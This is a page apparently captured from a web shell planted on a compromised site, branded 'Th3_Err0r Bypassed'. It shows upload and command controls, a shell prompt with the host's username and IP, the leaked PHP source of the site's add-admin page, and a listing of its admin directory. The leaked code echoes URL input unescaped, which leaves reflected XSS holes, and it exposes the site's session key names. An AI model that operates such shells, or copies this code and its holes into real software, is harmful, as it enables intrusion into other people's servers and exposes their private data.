[ Th3_Err0r Bypassed ]

Upload:

Command:

liwaavux@216.73.217.165: ~ $ 
<?php 
ob_start();
session_start();
?>
<?php
if(isset($_SESSION['user_liwwan_admin_2023930']) AND ($_SESSION['type'] == "manager_session_alliwan") ){
    
    $pageTitle  = 'ADD ADMIN';
    include 'init.php';
?>
<?php
if (($_SERVER['REQUEST_METHOD'] == 'POST') && isset($_POST['addadmin'])) {


        $username                       = filter_var($_POST['username'], FILTER_SANITIZE_STRING);
        $fullname                       = filter_var($_POST['fullname'], FILTER_SANITIZE_STRING);
        $password                     = filter_var($_POST['password'], FILTER_SANITIZE_STRING);
        $hashpass                     = password_hash($password, PASSWORD_ARGON2I);

          $formErrors = array();
  
          if (empty($fullname)){

              $formErrors[] = ' fullname Cant Be <strong>Empty</strong> ';
          }
          //loop into errors array and echo it
          foreach($formErrors as $error){

              echo '<div class= "alert alert-danger text-center">' .  $error .  '</div>' ;
          }
          if (empty($formErrors)){

                  $stmt = $conn->prepare("INSERT INTO
                  royaladmin(username, fullname, password, adddate)
                  VALUES (:zusn, :fuln, :zpass, now() ) ");
  
               $stmt->execute(array(

                   'zusn'                 => $username,
                   'zpass'                => $hashpass,
                   'fuln'                 => $fullname

               )); 
               
               header('location:admins.php');
               exit();
          }else{
            $msg=urlencode("البيانات المدخلة تحتوي على مشكلة" . "، أعد المحاولة");
            header('location:add_manager.php?Message='. $msg);

         exit();
        }
}
  ?>
  <section class="add_my">
    <form action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" class="form mt-5">
        <p class="text-center h3 fw-bold text-center m-auto add_my_p"> ADD ADMIN </p>
        <div class="ermsg">
            <?php if (isset($_GET['Message'])){?>
            <div class="text-center bg-danger text-light m-auto p-1 w-75 rounded mt-2 fw-bold">
                <p class="custom_msg"><?php echo $_GET['Message']; ?></p>
            </div>
            <?php }?>
        </div>
        <div class="row">
            <div class="input-group">
                <di class="col-12">
                    <div class="input-group">
                        <label for="username" class="text-muted fw-bold  w-100"> Username <span class="text-danger fs-5">◈</span></label>
                        <input type="text" name="username" class="w-75" id="username" required="required" />
                    </div>
                </di>
                
                <di class="col-12">
                    <div class="input-group">
                        <label for="fullname" class="text-muted fw-bold w-100"> fullname <span class="text-danger fs-5">◈</span></label>
                        <input type="text" name="fullname" class="w-75" id="fullname" required="required" />
                    </div>
                </di>
                <div class="input-group">
                    <div class="col-8">
                        <label for="Password" class="text-muted fw-bold w-100"> Password <span class="text-danger fs-5">◈</span></label>
                        <input type="password" name="password"  id="myInput" placeholder="كلمة المرور"/>
                    </div>
                    <div class="col-4 py-4 m-auto text-center">
                        <input type="checkbox" onclick="myFunction()"><span class="text-center m-auto ">Show</span>
                    </div>
                </div>
            </div>
            <hr>
            <div class="col-8"></div>
            <div class="col-4">
            <button class="btn btn-primary px-4" name="addadmin" type="submit">تأكيد</button>
            </div>
        </div>
    </form>
</section>
<script>
    function myFunction() {
  var x = document.getElementById("myInput");
  if (x.type === "password") {
    x.type = "text";
  } else {
    x.type = "password";
  }
}
</script>
<?php
include 'assets/includes/template/footer.php';
?>
<?php
}else{
header('Location:index.php');
exit;
}
?>
<?php
ob_end_flush();

Filemanager

DIR : / home/ liwaavux/ public_html/ admin/
Name Type Size Permission Actions
assets Folder 0755
images Folder 0755
ac_citycalc.php File 15.27 KB 0644
ac_edit_admin.php File 2.67 KB 0644
ac_edit_admininfo.php File 4.36 KB 0644
ac_edit_imgs.php File 34.27 KB 0644
ac_edit_pr.php File 10.72 KB 0644
ac_projects.php File 5.24 KB 0644
ac_workshops.php File 18.62 KB 0644
add_admin.php File 4.32 KB 0644
add_customer_template.php File 11.1 KB 0644
add_project.php File 17.22 KB 0644
add_workshop.php File 5.15 KB 0644
admins.php File 4.81 KB 0644
citycalc.php File 5.01 KB 0644
cons_orders.php File 4.51 KB 0644
custommer_templates.php File 4.59 KB 0644
dashboard.php File 4.11 KB 0644
edit_cus_template.php File 11.74 KB 0644
editadminpassword.php File 5.17 KB 0644
error_log File 309.84 KB 0644
imgs.php File 18.17 KB 0644
index.php File 3.19 KB 0644
init.php File 183 B 0644
logout.php File 186 B 0644
newsletter.php File 3.13 KB 0644
projects.php File 13.89 KB 0644
projects_card.php File 13.29 KB 0644
show.php File 8.81 KB 0644
workshop_details.php File 12.08 KB 0644
workshops.php File 4.63 KB 0644

© 2026 Coded By Th3_Err0r Code.